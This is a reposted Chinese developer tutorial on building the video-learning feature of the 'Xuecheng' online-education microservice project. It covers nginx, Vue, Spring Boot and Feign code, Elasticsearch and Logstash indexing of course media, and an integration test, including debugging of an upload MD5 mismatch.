后台搜索（公开api）upstream search_server_pool{server 127.0.0.1:40100 weight=10;} 学成网用户中心server {listen 80;server_name ucenter.xuecheng.com;个人中心location / {proxy_pass http://ucenter_server_pool;}后端搜索服务location /openapi/search/ {proxy_pass http://search_server_pool/search/;} } 前端 API 方法 在学习中心 xc-ui-pc-leanring 对课程信息的查询属于基础常用功能，所以我们将课程查询的 api 方法定义在base 模块下，如下图： 在system.js 中定义课程查询方法： import http from './public'export const course_view = id => {return http.requestGet('/openapi/search/course/getdetail/'+id);} 前端 API 方法调用 在 learning_video.vue 页面中调用课程信息查询接口得到课程计划，将课程计划json 串转成对象。 xc-ui-pc-leanring/src/module/course/page/learning_video.vue 1、定义视图 课程计划 <!--课程计划部分代码--><div class="navCont"><div class="course-weeklist"><div class="nav nav-stacked" v-for="(teachplan_first, index) in teachplanList"><div class="tit nav-justified text-center"><i class="pull-left glyphicon glyphicon-th-list"></i>{ {teachplan_first.pname} }<i class="pull-right"></i></div><li v-if="teachplan_first.children!=null" v-for="(teachplan_second, index) in teachplan_first.children"><i class="glyphicon glyphicon-check"></i><a :href="url" @click="study(teachplan_second.id)">{ {teachplan_second.pname} }</a></li><!-- <div class="tit nav-justified text-center"><i class="pull-left glyphicon glyphicon-th-list"></i>第一章<i class="pull-right"></i></div><li ><i class="glyphicon glyphicon-check"></i><a :href="url" >第一节</a></li>--><!--<li><i class="glyphicon glyphicon-unchecked"></i>为什么分为A、B、C部分</li>--></div></div></div> 课程名称 <div class="top text-center">{ {coursename} }</div> 定义数据对象 data() {return {url:'',//当前urlcourseId:'',//课程idchapter:'',//章节Idcoursename:'',//课程名称coursepic:'',//课程图片teachplanList:[],//课程计划playerOptions: {//播放参数autoplay: false,controls: true,sources: [{type: "application/x-mpegURL",src: ''}]},} } 在 created 钩子方法中获取课程信息 created(){//当前请求的urlthis.url = window.location//课程idthis.courseId = this.$route.params.courseId//章节idthis.chapter = this.$route.params.chapter//查询课程信息systemApi.course_view(this.courseId).then((view_course)=>{if(!view_course || !view_course[this.courseId]){this.$message.error("获取课程信息失败，请重新进入此页面！")return ;} let courseInfo = view_course[this.courseId]console.log(courseInfo)this.coursename = courseInfo.nameif(courseInfo.teachplan){let teachplan = JSON.parse(courseInfo.teachplan);this.teachplanList = teachplan.children;} })}, 测试 在浏览器请求：http://ucenter.xuecheng.com//learning/4028e581617f945f01617f9dabc40000/0 4028e581617f945f01617f9dabc40000：第一个参数为课程 id，测试时从 ES索引库找一个课程 id 0：第二个参数为课程计划 id，此参数用于点击课程计划播放视频。 如果出现跨域问题，但是确定已经配置了跨域，请尝试结束所以 nginx.exe 的进程 和 清空浏览器缓存。 如果还没有解决？重启电脑试试。 二、学习页面：获取视频播放地址 0x01 需求分析 用户进入在线学习页面，点击课程计划将播放该课程计划对应的教学视频。 业务流程如下： 业务流程说明： 1、用户进入在线学习页面，页面请求搜索服务获取课程信息（包括课程计划信息）并且在页面展示。 2、在线学习请求学习服务获取视频播放地址。 3、学习服务校验当前用户是否有权限学习，如果没有权限学习则提示用户。 4、学习服务校验通过，请求搜索服务获取课程媒资信息。 5、搜索服务请求ElasticSearch获取课程媒资信息。 为什么要请求 ElasticSearch 查询课程媒资信息？ 出于性能的考虑，公开查询课程信息从搜索服务查询，分摊 mysql 数据库的访问压力。 什么时候将课程媒资信息存储到 ElasticSearch 中？ 课程媒资信息是在课程发布的时候存入 ElasticSearch，因为课程发布后课程信息将基本不再修改。 0x02 课程发布：储存媒资信息 需求分析 课程媒资信息是在课程发布的时候存入 ElasticSearch 索引库，因为课程发布后课程信息将基本不再修改，具体的业务流程如下。 1、课程发布，向课程媒资信息表写入数据。 1）根据课程 id 删除 teachplanMediaPub 中的数据 2）根据课程 id 查询 teachplanMedia 数据 3）将查询到的 teachplanMedia 数据插入到 teachplanMediaPub 中 2、Logstash 定时扫描课程媒资信息表，并将课程媒资信息写入索引库。 数据模型 在 xc_course 数据库创建课程计划媒资发布表： CREATE TABLE teachplan_media_pub (teachplan_id varchar(32) NOT NULL COMMENT '课程计划id',media_id varchar(32) NOT NULL COMMENT '媒资文件id',media_fileoriginalname varchar(128) NOT NULL COMMENT '媒资文件的原始名称',media_url varchar(256) NOT NULL COMMENT '媒资文件访问地址',courseid varchar(32) NOT NULL COMMENT '课程Id',timestamp timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT'logstash使用',PRIMARY KEY (teachplan_id)) ENGINE=InnoDB DEFAULT CHARSET=utf8 数据模型类如下： package com.xuecheng.framework.domain.course;import lombok.Data;import lombok.ToString;import org.hibernate.annotations.GenericGenerator;import javax.persistence.;import java.io.Serializable;import java.util.Date;@Data@ToString@Entity@Table(name="teachplan_media_pub")@GenericGenerator(name = "jpa-assigned", strategy = "assigned")public class TeachplanMediaPub implements Serializable {private static final long serialVersionUID = -916357110051689485L;@Id@GeneratedValue(generator = "jpa-assigned")@Column(name="teachplan_id")private String teachplanId;@Column(name="media_id")private String mediaId;@Column(name="media_fileoriginalname")private String mediaFileOriginalName;@Column(name="media_url")private String mediaUrl;@Column(name="courseid")private String courseId;@Column(name="timestamp")private Date timestamp;//时间戳} Dao 创建 TeachplanMediaPub 表的 Dao，向 TeachplanMediaPub 存储信息采用先删除该课程的媒资信息，再添加该课程的媒资信息，所以这里定义根据课程 id 删除课程计划媒资方法： public interface TeachplanMediaPubRepository extends JpaRepository<TeachplanMediaPub, String> {//根据课程id删除课程计划媒资信息long deleteByCourseId(String courseId);} 从TeachplanMedia查询课程计划媒资信息 //从TeachplanMedia查询课程计划媒资信息public interface TeachplanMediaRepository extends JpaRepository<TeachplanMedia, String> {List<TeachplanMedia> findByCourseId(String courseId);} Service 编写保存课程计划媒资信息方法，并在课程发布时调用此方法。 1、保存课程计划媒资信息方法 本方法采用先删除该课程的媒资信息，再添加该课程的媒资信息，在 CourseService 下定义该方法 //保存课程计划媒资信息private void saveTeachplanMediaPub(String courseId){//查询课程媒资信息List<TeachplanMedia> byCourseId = teachplanMediaRepository.findByCourseId(courseId);if(byCourseId == null) return; //没有查询到媒资数据则直接结束该方法//将课程计划媒资信息储存到待索引表//删除原有的索引信息teachplanMediaPubRepository.deleteByCourseId(courseId);//一个课程可能会有多个媒资信息,遍历并使用list进行储存List<TeachplanMediaPub> teachplanMediaPubList = new ArrayList<>();for (TeachplanMedia teachplanMedia: byCourseId) {TeachplanMediaPub teachplanMediaPub = new TeachplanMediaPub();BeanUtils.copyProperties(teachplanMedia, teachplanMediaPub);teachplanMediaPubList.add(teachplanMediaPub);}//保存所有信息teachplanMediaPubRepository.saveAll(teachplanMediaPubList);} 2、课程发布时调用此方法 修改课程发布的 coursePublish 方法： ....//保存课程计划媒资信息到待索引表saveTeachplanMediaPub(courseId);//页面urlString pageUrl = cmsPostPageResult.getPageUrl();return new CoursePublishResult(CommonCode.SUCCESS,pageUrl);..... 测试 测试课程发布后是否成功将课程媒资信息存储到 teachplan_media_pub 中，测试流程如下： 1、指定一个课程 2、为课程计划添加课程媒资 3、执行课程发布 4、观察课程计划媒资信息是否存储至 teachplan_media_pub 中 注意：由于此测试仅用于测试发布课程计划媒资信息的功能，可暂时将 cms页面发布的功能暂时屏蔽，提高测试效率。 测试结果如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vrzs5589-1595567273126)(https://qnoss.codeyee.com/20200704_15/image7)] 0x03 Logstash：扫描课程计划媒资 Logstash 定时扫描课程媒资信息表，并将课程媒资信息写入索引库。 创建索引 1、创建 xc_course_media 索引 2、并向此索引创建如下映射 POST: http://localhost:9200/xc_course_media/doc/_mapping {"properties" : {"courseid" : {"type" : "keyword"},"teachplan_id" : {"type" : "keyword"},"media_id" : {"type" : "keyword"},"media_url" : {"index" : false,"type" : "text"},"media_fileoriginalname" : {"index" : false,"type" : "text"} }} 索引创建成功 创建模板文件 在 logstach 的 config 目录文件 xc_course_media_template.json 文件路径为 %ES_ROOT_DIR%/logstash6.8.8/config/xc_course_media_template.json %ES_ROOT_DIR% 为 ElasticSearch 和 logstash 的安装目录 内容如下： {"mappings" : {"doc" : {"properties" : {"courseid" : {"type" : "keyword"},"teachplan_id" : {"type" : "keyword"},"media_id" : {"type" : "keyword"},"media_url" : {"index" : false,"type" : "text"},"media_fileoriginalname" : {"index" : false,"type" : "text"} }},"template" : "xc_course_media"} } 配置 mysql.conf 在logstash的 config 目录下配置 mysql_course_media.conf 文件供 logstash 使用，logstash 会根据 mysql_course_media.conf 文件的配置的地址从 MySQL 中读取数据向 ES 中写入索引。 参考https://www.elastic.co/guide/en/logstash/current/plugins-inputs-jdbc.html 配置输入数据源和输出数据源。 input {stdin {} jdbc {jdbc_connection_string => "jdbc:mysql://localhost:3306/xc_course?useUnicode=true&characterEncoding=utf-8&useSSL=true&serverTimezone=UTC" 数据库信息jdbc_user => "root"jdbc_password => "123123" MYSQL 驱动地址,修改为maven仓库对应的位置jdbc_driver_library => "D:/soft/apache-maven-3.5.4/repository/mysql/mysql-connector-java/5.1.40/mysql-connector-java-5.1.40.jar" the name of the driver class for mysqljdbc_driver_class => "com.mysql.jdbc.Driver"jdbc_paging_enabled => "true"jdbc_page_size => "50000"要执行的sql文件statement_filepath => "/conf/course.sql"statement => "select from teachplan_media_pub where timestamp > date_add(:sql_last_value,INTERVAL 8 HOUR)"定时配置schedule => " "record_last_run => truelast_run_metadata_path => "D:/soft/elasticsearch/logstash-6.8.8/config/xc_course_media_metadata"} } output {elasticsearch {ES的ip地址和端口hosts => "localhost:9200"hosts => ["localhost:9200","localhost:9202","localhost:9203"]ES索引库名称index => "xc_course_media"document_id => "%{teachplan_id}"document_type => "doc"template => "D:/soft/elasticsearch/logstash-6.8.8/config/xc_course_media_template.json"template_name =>"xc_course_media"template_overwrite =>"true"} stdout {日志输出codec => json_lines} } 启动 logstash.bat 启动 logstash.bat 采集 teachplan_media_pub 中的数据，向 ES 写入索引。 logstash.bat -f ../config/mysql_course_media.conf 课程发布成功后，Logstash 会自动参加 teachplan_media_pub 表中新增的数据，效果如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ILPBxfXi-1595567273134)(https://qnoss.codeyee.com/20200704_15/image10)] Logstash多实例运行 由于之前我们还启动了一个 Logstash 对课程的发布信息进行采集，所以如果想两个 logstash 实例同时运行，因为每个实例都有一个.lock文件，所以不能使用同一个目录来存放数据，所以我们需要使用 --path.data= 为每个实例指定单独的数据目录，具体的代码如下： 该配置是在windows下进行的 课程发布实例 logstash_start_course_pub.bat @title logstash in course_publogstash.bat -f ..\config\mysql.conf --path.data=../data/course_pub 课程计划媒体发布实例 logstash_start_teachplan_media.bat @title logstash i n teachplan_media_publogstash.bat -f ../config/mysql_course_media.conf --path.data=../data/teachplan_media/ 同时运行效果如下 0x04 搜素服务：查询课程媒资接口 需求分析 搜索服务 提供查询课程媒资接口，此接口供学习服务调用。 Api接口定义 @ApiOperation("根据课程计划查询媒资信息")public TeachplanMediaPub getmedia(String teachplanId); Service 1、配置课程计划媒资索引库等信息 在 application.yml 中配置 xuecheng:elasticsearch:hostlist: ${eshostlist:127.0.0.1:9200} 多个结点中间用逗号分隔course:index: xc_coursetype: docsource_field: id,name,grade,mt,st,charge,valid,pic,qq,price,price_old,status,studymodel,teachmode,expires,pub_time,start_time,end_timemedia:index: xc_course_mediatype: docsource_field: courseid,media_id,media_url,teachplan_id,media_fileoriginalname 2、service 方法开发 在 课程搜索服务 中定义课程媒资查询接口，为了适应后续需求，service 参数定义为数组，可一次查询多个课程计划的媒资信息。 / 根据一个或者多个课程计划id查询媒资信息 @param teachplanIds 课程id @return QueryResponseResult/public QueryResponseResult<TeachplanMediaPub> getmedia(String [] teachplanIds){//设置索引SearchRequest searchRequest = new SearchRequest(media_index);//设置类型searchRequest.types(media_type);//创建搜索源对象SearchSourceBuilder searchSourceBuilder = new SearchSourceBuilder();//源字段过滤String[] media_index_arr = media_field.split(",");searchSourceBuilder.fetchSource(media_index_arr, new String[]{});//查询条件,根据课程计划id查询(可以传入多个课程计划id)searchSourceBuilder.query(QueryBuilders.termsQuery("teachplan_id", teachplanIds));searchRequest.source(searchSourceBuilder);SearchResponse searchResponse = null;try {searchResponse = restHighLevelClient.search(searchRequest);} catch (IOException e) {e.printStackTrace();}//获取结果SearchHits hits = searchResponse.getHits();long totalHits = hits.getTotalHits();SearchHit[] searchHits = hits.getHits();//数据列表List<TeachplanMediaPub> teachplanMediaPubList = new ArrayList<>();for(SearchHit hit:searchHits){TeachplanMediaPub teachplanMediaPub =new TeachplanMediaPub();Map<String, Object> sourceAsMap = hit.getSourceAsMap();//取出课程计划媒资信息String courseid = (String) sourceAsMap.get("courseid");String media_id = (String) sourceAsMap.get("media_id");String media_url = (String) sourceAsMap.get("media_url");String teachplan_id = (String) sourceAsMap.get("teachplan_id");String media_fileoriginalname = (String) sourceAsMap.get("media_fileoriginalname");teachplanMediaPub.setCourseId(courseid);teachplanMediaPub.setMediaUrl(media_url);teachplanMediaPub.setMediaFileOriginalName(media_fileoriginalname);teachplanMediaPub.setMediaId(media_id);teachplanMediaPub.setTeachplanId(teachplan_id);//将对象加入到列表中teachplanMediaPubList.add(teachplanMediaPub);}//构建返回课程媒资信息对象QueryResult<TeachplanMediaPub> queryResult = new QueryResult<>();queryResult.setList(teachplanMediaPubList);queryResult.setTotal(totalHits);return new QueryResponseResult<TeachplanMediaPub>(CommonCode.SUCCESS,queryResult);} Controller / 根据课程计划id搜索发布后的媒资信息 @param teachplanId @return/@GetMapping(value="/getmedia/{teachplanId}")@Overridepublic TeachplanMediaPub getmedia(@PathVariable("teachplanId") String teachplanId) {//为了service的拓展性,所以我们service接收的是数组作为参数,以便后续开发查询多个ID的接口String[] teachplanIds = new String[]{teachplanId};//通过service查询ES获取课程媒资信息QueryResponseResult<TeachplanMediaPub> mediaPubQueryResponseResult = esCourseService.getmedia(teachplanIds);QueryResult<TeachplanMediaPub> queryResult = mediaPubQueryResponseResult.getQueryResult();if(queryResult!=null&& queryResult.getList()!=null&& queryResult.getList().size()>0){//返回课程计划对应课程媒资return queryResult.getList().get(0);} return new TeachplanMediaPub();} 测试 使用 swagger-ui 和 postman 测试课程媒资查询接口。 三、在线学习：接口开发 0x01 需求分析 根据下边的业务流程，本章节完成前端学习页面请求学习服务获取课程视频地址，并自动播放视频。 0x02 搭建开发环境 1、创建数据库 创建 xc_learning 数据库，学习数据库将记录学生的选课信息、学习信息。 导入：资料/xc_learning.sql 2、创建学习服务工程 参考课程管理服务工程结构，创建学习服务工程： 导入：资料/xc-service-learning.zip 项目工程结构如下 0x03 Api接口 此 api 接口是课程学习页面请求学习服务获取课程学习地址。 定义返回值类型： package com.xuecheng.framework.domain.learning.response;import com.xuecheng.framework.model.response.ResponseResult;import com.xuecheng.framework.model.response.ResultCode;import lombok.Data;import lombok.NoArgsConstructor;import lombok.ToString;@Data@ToString@NoArgsConstructorpublic class GetMediaResult extends ResponseResult {public GetMediaResult(ResultCode resultCode, String fileUrl) {super(resultCode);this.fileUrl = fileUrl;}//媒资文件播放地址private String fileUrl;} 定义接口，学习服务根据传入课程 ID、章节 Id(课程计划 ID)来取学习地址。 @Api(value = "录播课程学习管理",description = "录播课程学习管理")public interface CourseLearningControllerApi {@ApiOperation("获取课程学习地址")public GetMediaResult getMediaPlayUrl(String courseId,String teachplanId);} 0x04 服务端开发 需求分析 学习服务根据传入课程ID、章节Id(课程计划ID)请求搜索服务获取学习地址。 搜索服务注册Eureka 学习服务要调用搜索服务查询课程媒资信息，所以需要将搜索服务注册到 eureka 中。 1、查看服务名称是否为 xc-service-search 注意修改application.xml中的服务名称：spring:application:name: xc‐service‐search 2、配置搜索服务的配置文件 application.yml，加入 Eureka 配置 如下： eureka:client:registerWithEureka: true 服务注册开关fetchRegistry: true 服务发现开关serviceUrl: Eureka客户端与Eureka服务端进行交互的地址，多个中间用逗号分隔defaultZone: ${EUREKA_SERVER:http://localhost:50101/eureka/,http://localhost:50102/eureka/}instance:prefer-ip-address: true 将自己的ip地址注册到Eureka服务中ip-address: ${IP_ADDRESS:127.0.0.1}instance-id: ${spring.application.name}:${server.port} 指定实例idribbon:MaxAutoRetries: 2 最大重试次数，当Eureka中可以找到服务，但是服务连不上时将会重试，如果eureka中找不到服务则直接走断路器MaxAutoRetriesNextServer: 3 切换实例的重试次数OkToRetryOnAllOperations: false 对所有操作请求都进行重试，如果是get则可以，如果是post，put等操作没有实现幂等的情况下是很危险的,所以设置为falseConnectTimeout: 5000 请求连接的超时时间ReadTimeout: 6000 请求处理的超时时间 3、添加 eureka 依赖 <dependency><groupId>org.springframework.cloud</groupId><artifactId>spring‐cloud‐starter‐netflix‐eureka‐client</artifactId></dependency> 4、修改启动类，在class上添加如下注解： @EnableDiscoveryClient 搜索服务客户端 在 学习服务 创建搜索服务的客户端接口，此接口会生成代理对象，调用搜索服务： package com.xuecheng.learning.client;import com.xuecheng.framework.domain.course.TeachplanMediaPub;import org.springframework.cloud.openfeign.FeignClient;import org.springframework.web.bind.annotation.GetMapping;import org.springframework.web.bind.annotation.PathVariable;@FeignClient(value = "xc‐service‐search")public interface CourseSearchClient {@GetMapping(value="/getmedia/{teachplanId}")public TeachplanMediaPub getmedia(@PathVariable("teachplanId") String teachplanId);} 自定义错误代码 我们在 com.xuecheng.framework.domain.learning.response 包下自定义一个错误消息模型 package com.xuecheng.framework.domain.learning.response;import com.xuecheng.framework.model.response.ResultCode;import lombok.ToString;@ToStringpublic enum LearningCode implements ResultCode {LEARNING_GET_MEDIA_ERROR(false,23001,"学习中心获取媒资信息错误！");//操作代码boolean success;//操作代码int code;//提示信息String message;private LearningCode(boolean success, int code, String message){this.success = success;this.code = code;this.message = message;}@Overridepublic boolean success() {return success;}@Overridepublic int code() {return code;}@Overridepublic String message() {return message;} } 该消息模型基于 ResultCode 来实现，代码如下 package com.xuecheng.framework.model.response;/ Created by mrt on 2018/3/5. 10000-- 通用错误代码 22000-- 媒资错误代码 23000-- 用户中心错误代码 24000-- cms错误代码 25000-- 文件系统/public interface ResultCode {//操作是否成功,true为成功，false操作失败boolean success();//操作代码int code();//提示信息String message(); 从 ResultCode 中我们可以看出，我们约定了用户中心的错误代码使用 23000，所以我们定义的一些错误信息的代码就从 23000 开始计数。 Service 在学习服务中定义 service 方法，此方法远程请求课程管理服务、媒资管理服务获取课程学习地址。 package com.xuecheng.learning.service.impl;import com.netflix.discovery.converters.Auto;import com.xuecheng.framework.domain.course.TeachplanMediaPub;import com.xuecheng.framework.domain.learning.response.GetMediaResult;import com.xuecheng.framework.exception.ExceptionCast;import com.xuecheng.framework.model.response.CommonCode;import com.xuecheng.learning.client.CourseSearchClient;import com.xuecheng.learning.service.LearningService;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.stereotype.Service;@Servicepublic class LearningServiceImpl implements LearningService {@AutowiredCourseSearchClient courseSearchClient;/ 远程调用搜索服务获取已发布媒体信息中的url @param courseId 课程id @param teachplanId 媒体信息id @return/@Overridepublic GetMediaResult getMediaPlayUrl(String courseId, String teachplanId) {//校验学生权限,是否已付费等//远程调用搜索服务进行查询媒体信息TeachplanMediaPub mediaPub = courseSearchClient.getmedia(teachplanId);if(mediaPub == null) ExceptionCast.cast(CommonCode.FAIL);return new GetMediaResult(CommonCode.SUCCESS, mediaPub.getMediaUrl());} } Controller 调用 service 根据课程计划 id 查询视频播放地址： @RestController@RequestMapping("/learning/course")public class CourseLearningController implements CourseLearningControllerApi {@AutowiredLearningService learningService;@Override@GetMapping("/getmedia/{courseId}/{teachplanId}")public GetMediaResult getMediaPlayUrl(@PathVariable String courseId, @PathVariable String teachplanId) {//获取课程学习地址return learningService.getMedia(courseId, teachplanId);} } 测试 使用 swagger-ui 或postman 测试学习服务查询课程视频地址接口。 0x05 前端开发 需求分析 需要在学习中心前端页面需要完成如下功能： 1、进入课程学习页面需要带上 课程 Id参数及课程计划Id的参数，其中 课程 Id 参数必带，课程计划 Id 可以为空。 2、进入页面根据 课程 Id 取出该课程的课程计划显示在右侧。 3、进入页面后判断如果请求参数中有课程计划 Id 则播放该章节的视频。 4、进入页面后判断如果 课程计划id 为0则需要取出本课程第一个 课程计划的Id，并播放第一个课程计划的视频。 进入到模块 xc-ui-pc-leanring/src/module/course api方法 let sysConfig = require('@/../config/sysConfig')let apiUrl = sysConfig.xcApiUrlPre;/获取播放地址/export const get_media = (courseId,chapter) => {return http.requestGet(apiUrl+'/api/learning/course/getmedia/'+courseId+'/'+chapter);} 配置代理 在 Nginx 中的 ucenter.xuecheng.com 虚拟主机中配置 /api/learning/ 的路径转发，此url 请转发到学习服务。 学习服务upstream learning_server_pool{server 127.0.0.1:40600 weight=10;}学成网用户中心server {listen 80;server_name ucenter.xuecheng.com;个人中心location / {proxy_pass http://ucenter_server_pool;}后端搜索服务location /openapi/search/ {proxy_pass http://search_server_pool/search/; }学习服务location ^~ /api/learning/ {proxy_pass http://learning_server_pool/learning/;} } 视频播放页面 1、如果传入的课程计划id为0则取出第一个课程计划id 在 created 钩子方法中完成 created(){//当前请求的urlthis.url = window.location//课程idthis.courseId = this.$route.params.courseId//章节idthis.chapter = this.$route.params.chapter//查询课程信息systemApi.course_view(this.courseId).then((view_course)=>{if(!view_course || !view_course[this.courseId]){this.$message.error("获取课程信息失败，请重新进入此页面！")return ;}let courseInfo = view_course[this.courseId]console.log(courseInfo)this.coursename = courseInfo.nameif(courseInfo.teachplan){console.log("准备开始播放视频")let teachplan = JSON.parse(courseInfo.teachplan);this.teachplanList = teachplan.children;//开始学习if(this.chapter == "0" || !this.chapter){//取出第一个教学计划this.chapter = this.getFirstTeachplan();console.log("第一个教学计划id为 ",this.chapter);this.study(this.chapter);}else{this.study(this.chapter);} }})}, 取出第一个章节 id，用户未输入课程计划 id 或者输入为 0 时，播放第一个。 //取出第一个章节getFirstTeachplan(){for(var i=0;i<this.teachplanList.length;i++){let firstTeachplan = this.teachplanList[i];//如果当前children存在，则取出第一个返回if(firstTeachplan.children && firstTeachplan.children.length>0){let secondTeachplan = firstTeachplan.children[0];return secondTeachplan.id;} }return ;}, 开始学习： //开始学习study(chapter){// 获取播放地址courseApi.get_media(this.courseId,chapter).then((res)=>{if(res.success){let fileUrl = sysConfig.videoUrl + res.fileUrl//播放视频this.playvideo(fileUrl)}else if(res.message){this.$message.error(res.message)}else{this.$message.error("播放视频失败，请刷新页面重试")} }).catch(res=>{this.$message.error("播放视频失败，请刷新页面重试")});}, 2、点击右侧课程章节切换播放 在原有代码基础上添加 click 事件，点击调用开始学习方法（study）。 <li v‐if="teachplan_first.children!=null" v‐for="(teachplan_second, index) inteachplan_first.children"><i class="glyphicon glyphicon‐check"></i><a :href="url" @click="study(teachplan_second.id)">{ {teachplan_second.pname} }</a></li> 3、地址栏路由url变更 这里需要注意一个问题，在用户点击课程章节切换播放时，地址栏的 url 也应该同步改变为当前所选择的课程计划 id 4、在线学习按钮 将 learnstatus 默认更改为 1，这样就能显示出马上学习的按钮，方便我们后续的集成测试。 文件路径为 xc-ui-pc-static-portal/include/course_detail_dynamic.html 部分代码块如下 <script>var body= new Vue({ //创建一个Vue的实例el: "body", //挂载点是id="app"的地方data: {editLoading: false,title:'测试',courseId:'',charge:'',//203001免费,203002收费learnstatus: 1 ,//课程状态，1：马上学习，2：立即报名、3：立即购买course:{},companyId:'template',company_stat:[],course_stat:{"s601001":"","s601002":"","s601003":""} }, 简单的测试 访问在线学习页面：http://ucenter.xuecheng.com//learning/课程id/课程计划id 通过 url 传入两个参数：课程id 和 课程计划id 如果没有课程计划则传入0 测试项目如下： 1、传入正确的课程id、课程计划id，自动播放本章节的视频 2、传入正确的课程id、课程计划id传入0，自动播放第一个视频 3、传入错误的课程id 或 课程计划id，提示错误信息。 4、通过右侧章节目录切换章节及播放视频。 访问： http://ucenter.xuecheng.com//learning/4028e58161bcf7f40161bcf8b77c0000/4028e58161bd18ea0161bd1f73190008 传入正确的课程id、课程计划id，自动播放本章节的视频 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ef0xxym7-1595567273153)(https://qnoss.codeyee.com/20200704_15/image17)] 传入正确的课程id、课程计划id传入0，自动播放第一个视频 访问 http://ucenter.xuecheng.com//learning/4028e58161bcf7f40161bcf8b77c0000/0 识别出第一个课程计划的 id 需要注意的是这里的 chapter 参数是我自己在 study 函数里加上去的，可以忽略。 传入错误的课程id或课程计划id，提示错误信息。 通过右侧章节目录切换章节及播放视频。 点击章节即可播放，但是点击制定章节后 url 没有发生改变，这个问题暂时还没有解决，关注笔记后面的内容。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TOGdxwb4-1595567273158)(https://qnoss.codeyee.com/20200704_15/image20)] 完整的测试 准备工作 启动 RabbitMQ，启动 Logstash、ElasticSearch 建议把所有后端服务都开起来 启动 前端静态门户、启动 nginx 、启动课程管理前端 我们整理一下测试的流程 上传两个媒资视频文件，用于测试 进入到课程管理，为课程计划选择媒资信息 发布课程，等待 logstash 将数据采集到 ElasticSearch 的索引库中 进入学成网主页，点击课程，进入到搜索门户页面 搜索课程，进入到课程详情页面 点击开始学习，进入到课程学习页面，选择课程计划中的一个章节进行学习。 1、上传文件 首先我们使用之前开发的媒资管理模块，上传两个视频文件用于测试。 第一个文件上传成功 一些问题 在上传第二个文件时，发生了错误，我们来检查一下问题出在了哪里 在媒体服务的控制台中可以看到，在 mergeChunks 方法在校验文件 md5 时候抛出了异常 我们在 MD5 校验这里打个断点，重新上传文件，分析一下问题所在。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OpEMZGI8-1595567273166)(https://qnoss.codeyee.com/20200704_15/image23)] 单步调试后发现，合并文件后的MD5值与用户上传的源文件值不相等 方案1：删除本地分块文件重新尝试上传 考虑到可能是在用户上传完 视频的分块文件时发生了一些问题，导致合并文件后与源文件的大小不等，导致MD5也不相同，这里我们把这个视频上传到本地的文件全部删除，在媒资上传页面重新上传文件。 对比所有分块文件的字节大小和本地源文件的大小，完全是相等的 删除所有文件后重新上传，md5值还是不等，考虑从调试一下文件合并的代码。 方案2：检查前端提交的MD5值是否正确 在查阅是否有其他的MD5值获取方案时，发现了一个使用 windows 本地命令获取文件MD5值的方法 certutil -hashfile .\19-在线学习接口-集成测试.avi md5 惊奇的发现，TM的原来是前端那边转换的MD5值不正确，后端这边是没有问题的。 从前面的图可以看出，本地和后端转换的都是以一个 f6f0 开头的MD5值 那么问题就出现在前端了，还需要花一些时间去分析一下，这里暂时就先告一段落，因为上传了几个文件测试中只有这一个文件出现了问题。 2、为课程计划选择媒资信息 进入到一个课程的管理页面 http://localhost:12000//course/manage/baseinfo/4028e58161bcf7f40161bcf8b77c0000 将刚才我们上传的媒资文件的信息和课程计划绑定 选择效果如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-epKaqzCD-1595567273178)(https://qnoss.codeyee.com/20200704_15/image29)] 2、发布课程，等待 logstash 从 course_pub 以及 teachplan_media_pub 表中采集数据到 ElasticSearch 当中 发布成功后，我们可以从 teachplan_media_pub 表中看到刚才我们发布的媒资信息 再观察 Logstash 的控制台，发现两个 Logstash 的实例都对更新的课程发布信息进行了采集 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hTUve2ik-1595567273183)(https://qnoss.codeyee.com/20200704_15/image32)] 3、前端门户测试 打开我们的门户主站 http://www.xuecheng.com/ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4wZe9R84-1595567273185)(https://qnoss.codeyee.com/20200704_15/image33)] 点击导航栏的课程，进入到我们的搜索门户页面 如果无法进入到搜索门户，请检查你的 xc-ui-pc-portal 前端工程是否已经启动 进入到搜索门户后，可以看到一些初始化时搜索的课程数据，默认是搜索第一页的数据，每页2个课程。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BJ1AKoJb-1595567273187)(https://qnoss.codeyee.com/20200704_15/image34)] 我们可以测试搜索一下前面我们选择媒资信息时所用的课程 点击课程，进入到课程详情页面，然后再点击开始学习。 点击马上学习后，会进入到该课程的在线学习页面，默认自动播放我们第一个课程计划中的视频。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tcuLWnf2-1595567273193)(https://qnoss.codeyee.com/20200704_15/image37)] 我们可以在右侧的目录中选择第二个课程计划，会自动播放所选的课程计划所对应的媒资视频播放地址，该 播放地址正是我们刚才通过 Logstash 自动采集到 ElasticSearch 的索引信息，效果图如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cvi9Dr0Y-1595567273195)(https://qnoss.codeyee.com/20200704_15/image38)] 四、待完善的一些功能 课程发布前，校验课程计划里面是否包含二级课程计划 课程发布前，校验课程计划信息里面是否全部包含媒资信息 删除媒资信息，并且同步删除ES中的索引 在获取该课程的播放地址时校验用户的合法、 在线学习页面，点击右侧目录中的课程计划同时改变url中的课程计划地址 视频文件 19-在线学习接口-集成测试.avi 前端上传时提交的MD5值不正确 😁 认识作者 作者：👦 LCyee ，全干型代码🐕 自建博客：https://www.codeyee.com 记录学习以及项目开发过程中的笔记与心得，记录认知迭代的过程，分享想法与观点。 CSDN 博客：https://blog.csdn.net/codeyee 记录和分享一些开发过程中遇到的问题以及解决的思路。 欢迎加入微服务练习生的队伍，一起交流项目学习过程中的一些问题、分享学习心得等，不定期组织一起刷题、刷项目，共同见证成长。 本篇文章为转载内容。原文链接：https://blog.csdn.net/codeyee/article/details/107558901。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 